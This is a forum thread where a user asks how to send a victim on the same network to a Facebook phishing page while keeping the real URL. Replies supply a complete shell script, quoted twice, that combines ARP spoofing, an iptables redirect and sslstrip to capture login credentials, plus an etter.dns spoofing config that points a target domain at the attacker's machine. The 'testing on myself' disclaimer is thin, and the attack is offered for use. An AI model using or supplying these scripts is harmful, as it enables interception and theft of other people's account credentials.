MITM redirect only when browsing specific URL?

[Jordsie669]

Hello, when I have like my facebook phisher on (se-toolkit) (victim on the same network)
I want to be able to redirect the victim to the phisher when he visits the real facebook.
How could I do this?? What would even be better is that if the victim is then redirected, that the URL is still facebook.com.

Thanks in advance.
(I'm only going to test this on myself legally)

[root-boy]

You need to perform a DNS spoofing attack.

[shaberu]

why not use subterfuge and run a rogue dhcp you should get your password.

[root-boy]

why not use subterfuge and run a rogue dhcp you should get your password.

It dependens, if the victim is using ssl it will not be possible to get the password...

[pentest09]

Try this even on ssl it will capture the password.

script:
#!/bin/sh
#Created by DG Consulting Uk for the easy automation of penetration Tasks
#copyright 2011 DG Consulting Uk
lanIP=`ifconfig | grep "inet addr" | awk '{print $2}' | cut -d":" -f2 | sed 's/127.0.0.1//g'`
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

echo Ssl-communications sniffer v2.0
echo Written by DeeGee
echo copyright 2011

echo [!] Initializing ssl attax
################################################## ################################################## #####
#cleanup script
killall ettercap
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # just to make sure
iptables --table nat --flush # now everything's clean
iptables --delete-chain
iptables --table nat --delete-chain


################################################## ################################################## #####

echo -n "Enter your interface and press [Enter]: "
read -e interface

echo -n "Enter the target IP and press [Enter]: "
read -e target

################################################## ################################################## #####

echo "Setting up ip_forwarding: "

echo "1" > /proc/sys/net/ipv4/ip_forward

echo "Setting up Ip tables rule: "

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

xterm -hold -e sslstrip -l 10000 &

xterm -hold -e tail -f sslstrip.log &

arpspoof -i $interface -t $target $gatewayIP

################################################## ################

It will need a few changes on Kali but it works flawlessly on BT5 R2/3

Run and fix the errors if any pop up (ie) xterm -hold -e ...............may need xterm -hold....

[pentest09]

Alternatively you could run a simple DNS redirect using etter.dns

etter.dns:

target-url.com A 192.168.0.13
www.target-url.com A 192.168.0.13

192.168.0.13 being your ip on the lan.

This will need a phishing page which posts data to another file and its all http instead of https

Kind Regards Dee

[root-boy]

Try this even on ssl it will capture the password.

script:
#!/bin/sh
#Created by DG Consulting Uk for the easy automation of penetration Tasks
#copyright 2011 DG Consulting Uk
lanIP=`ifconfig | grep "inet addr" | awk '{print $2}' | cut -d":" -f2 | sed 's/127.0.0.1//g'`
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

echo Ssl-communications sniffer v2.0
echo Written by DeeGee
echo copyright 2011

echo [!] Initializing ssl attax
################################################## ################################################## #####
#cleanup script
killall ettercap
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # just to make sure
iptables --table nat --flush # now everything's clean
iptables --delete-chain
iptables --table nat --delete-chain


################################################## ################################################## #####

echo -n "Enter your interface and press [Enter]: "
read -e interface

echo -n "Enter the target IP and press [Enter]: "
read -e target

################################################## ################################################## #####

echo "Setting up ip_forwarding: "

echo "1" > /proc/sys/net/ipv4/ip_forward

echo "Setting up Ip tables rule: "

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

xterm -hold -e sslstrip -l 10000 &

xterm -hold -e tail -f sslstrip.log &

arpspoof -i $interface -t $target $gatewayIP

################################################## ################

It will need a few changes on Kali but it works flawlessly on BT5 R2/3

Run and fix the errors if any pop up (ie) xterm -hold -e ...............may need xterm -hold....

this script implements the sslstrip attack, it's does not work if the victim is using ssl by default. For example if the victim tries to login to his gmail account, if he browses to http://gmail.com the attacks will work but if he browses to https://gmail.com it will not work.

[root-boy]

Alternatively you could run a simple DNS redirect using etter.dns

etter.dns:

target-url.com A 192.168.0.13
www.target-url.com A 192.168.0.13

192.168.0.13 being your ip on the lan.

This will need a phishing page which posts data to another file and its all http instead of https

Kind Regards Dee

That's the DNS spoofing attack that i was talking about.

[pentest09]

this script implements the sslstrip attack, it's does not work if the victim is using ssl by default. For example if the victim tries to login to his gmail account, if he browses to http://gmail.com the attacks will work but if he browses to https://gmail.com it will not work.

No if you login to facebook its https, sslstrip captures the creds same with gmail or any other https site but in the url it will show http:

[pentest09]

That's the DNS spoofing attack that i was talking about.

Hers a vid i did a while ago, read description for hd version
http://blip.tv/dgconsultinguk/dns_sp...ntials-4517172
Hope it helps..

[root-boy]

No if you login to facebook its https, sslstrip captures the creds same with gmail or any other https site but in the url it will show http:

I'm not sure if you understood me correctly but read this

[root-boy]

What i'm trying to explain is:

when the victim uses https from the beginning, the attack will not work. for example if the victime browses to http://gmail.com, fills the form and clicks login, normaly the victim will be redirected to https://gmail.com but in this case ssltrip will force the credentials to be send over http not https and this is the role of ssltrip. However if the victim browses to https://gmail.com and login the attack will fail because it's already a secure connection.

[pentest09]

Gotcha! sorry ...that was one of the reasons I used a phisher method because eset blocked the attacks but phisher method worked..hope the vid helped

[root-boy]

Yep thanks for the video man.